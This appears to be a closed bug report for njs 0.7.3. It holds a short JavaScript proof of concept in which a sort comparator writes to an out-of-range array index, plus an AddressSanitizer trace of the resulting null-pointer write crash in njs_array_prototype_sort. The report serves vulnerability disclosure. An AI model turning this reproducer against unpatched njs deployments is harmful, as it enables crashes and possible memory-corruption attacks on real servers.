Closed
Description
Environment
OS : Linux leanderwang-LC2 5.13.0-30-generic #33 SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : f65981b
Version : 0.7.3
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"
PoC
function main() {
var empty = {};
var arr1 = [empty,empty];
function func(arg) {
arr1[0xffff] *= arg;
}
var v5 = arr1.sort(func);
}
main();Stack dump
AddressSanitizer:DEADLYSIGNAL
=================================================================
==610159==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7ffff6f91b13 bp 0x7fffffffb3d0 sp 0x7fffffffab48 T0)
==610159==The signal is caused by a WRITE memory access.
==610159==Hint: address points to the zero page.
#0 0x7ffff6f91b12 in memcpy (/lib/x86_64-linux-gnu/libc.so.6+0xbbb12)
#1 0x7ffff7688d40 in __asan_memcpy ../../../../src/libsanitizer/asan/asan_interceptors_memintrinsics.cc:21
#2 0x5555556042ff in njs_array_prototype_sort src/njs_array.c:2704
#3 0x55555561961c in njs_function_native_call src/njs_function.c:739
#4 0x5555555bf0fb in njs_vmcode_interpreter src/njs_vmcode.c:788
#5 0x555555618aba in njs_function_lambda_call src/njs_function.c:703
#6 0x5555555bf0fb in njs_vmcode_interpreter src/njs_vmcode.c:788
#7 0x5555555b90ba in njs_vm_start src/njs_vm.c:553
#8 0x5555555a23f8 in njs_process_script src/njs_shell.c:890
#9 0x5555555a2ebf in njs_process_file src/njs_shell.c:619
#10 0x5555555a421f in main src/njs_shell.c:303
#11 0x7ffff6efa0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
#12 0x55555559fc4d in _start (/home/wz/njs/njs/build/njs+0x4bc4d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbbb12) in memcpy
==610159==ABORTINGCredit
xmzyshypnc(@xmzyshypnc) and P1umer(@P1umer)